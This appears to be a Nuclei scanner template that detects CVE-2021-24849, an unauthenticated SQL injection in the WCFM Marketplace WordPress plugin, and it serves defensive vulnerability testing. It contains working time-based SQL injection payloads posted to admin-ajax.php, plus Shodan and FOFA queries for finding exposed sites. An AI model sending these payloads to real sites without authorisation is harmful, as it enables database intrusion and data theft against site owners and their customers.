WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection

id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89814
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
    fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950